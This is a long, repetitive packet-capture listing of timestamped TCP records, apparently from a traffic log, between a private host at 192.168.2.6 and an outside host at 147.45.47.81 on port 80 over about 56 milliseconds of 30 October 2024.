                                                              Oct 30, 2024 15:44:45.859674931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.859718084 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.859745026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.860585928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.860604048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.860629082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.861427069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.861469030 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.861522913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.862304926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.862346888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.862366915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.863121033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.863162994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.863178968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.863943100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.863979101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.863986015 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.864820957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.864860058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.864989042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.865498066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.865541935 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.865617990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.866286993 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.866328001 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.866329908 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.867113113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.867156029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.867160082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.867940903 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.867959023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.867983103 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.868700027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.868741035 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.868767023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.869565964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.869602919 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.869627953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.870280027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.870326042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.870353937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.871073961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.871093035 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.871164083 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.871802092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.871869087 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.871871948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.872560024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.872603893 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.872656107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.873359919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.873373032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.873404026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.873969078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.873994112 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.874011040 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.874695063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.874737024 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.874754906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.875317097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.875360012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.875360966 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.875962973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.876000881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.876032114 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.876622915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.876633883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.876645088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.876667976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.876698017 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.877574921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.877594948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.877605915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.877630949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.878551006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.878592014 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.878592014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.878603935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.878635883 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.879501104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.879513979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.879525900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.879550934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.880376101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.880417109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.880423069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.880429983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.880459070 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.881418943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.881432056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.881443977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.881486893 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.882270098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.882281065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.882292032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.882313967 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.882332087 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.883164883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.883177042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.883188963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.883215904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.884067059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.884078026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.884084940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.884126902 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.884843111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.884884119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.884896040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.884929895 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.885788918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.885822058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.885833025 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.885835886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.885868073 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.886485100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.886497021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.886507988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.886532068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.887247086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.887293100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.887294054 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.887305021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.887337923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.887989044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.888258934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.888271093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.888292074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.888319969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.888336897 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.889007092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889066935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889080048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889106035 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.889744997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889756918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889767885 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889779091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.889786005 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.889816999 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.890667915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.890680075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.890691042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.890714884 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.890727043 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.890737057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.891597033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.891642094 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.891650915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.891660929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.891684055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.891695976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.892611027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.892653942 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.892654896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.892667055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.892688990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.892697096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.893677950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.893718004 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.893749952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.893796921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.893840075 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.893856049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.894481897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.894503117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.894521952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.894526958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.894535065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.894602060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.895482063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.895524025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.895526886 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.895559072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.895570040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.895598888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.896367073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.896379948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.896394014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.896405935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.896414042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.896437883 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.897253990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.897273064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.897284031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.897298098 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.897320032 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.897340059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898104906 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898118973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898130894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898143053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898149014 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.898164034 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.898947954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898957968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898968935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898979902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.898988962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.899010897 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.899655104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.899729013 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.899732113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900084972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900125027 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.900134087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900145054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900156975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900186062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.900906086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900950909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900950909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.900963068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900985956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.900989056 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.901794910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.901806116 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.901817083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.901828051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.901842117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.901870012 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.902524948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.902566910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.902580023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.902591944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.902604103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.902615070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.902630091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.902651072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.903454065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.903537989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.903548956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.903559923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.903572083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.903578997 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.903624058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.904397011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.904441118 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.904443979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.904454947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.904489040 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.904505014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.904516935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.904551983 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.905303955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.905350924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.905368090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.905380011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.905390978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.905395031 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.905411959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.906208992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.906250954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.906255007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.906264067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.906292915 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.906322956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.906336069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.906384945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.907136917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.907154083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.907160044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.907174110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.907190084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.907195091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.907249928 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.908082962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.908094883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.908107042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.908119917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.908132076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.908133030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.908157110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.908175945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.909475088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909487009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909504890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909517050 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909524918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.909528971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909553051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.909723043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909761906 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.909826040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909837961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909849882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909859896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.909878969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.909894943 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.910618067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.910659075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.910670996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.910695076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.910721064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.910732985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.910762072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.911504030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.911521912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.911534071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.911545038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.911550999 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.911556959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.911565065 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.911596060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.912305117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.912316084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.912327051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.912338972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.912349939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.912353039 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.912388086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.913157940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.913175106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.913186073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.913197041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.913209915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.913212061 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.913218021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.913249969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.913896084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.913992882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914004087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914014101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914025068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914028883 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.914036989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914057016 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.914072990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.914896965 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914910078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914921045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914942980 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.914954901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914966106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914977074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.914993048 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.915004969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.915761948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.915772915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.915791988 CET8049995147.45.47.81192.168.2.6
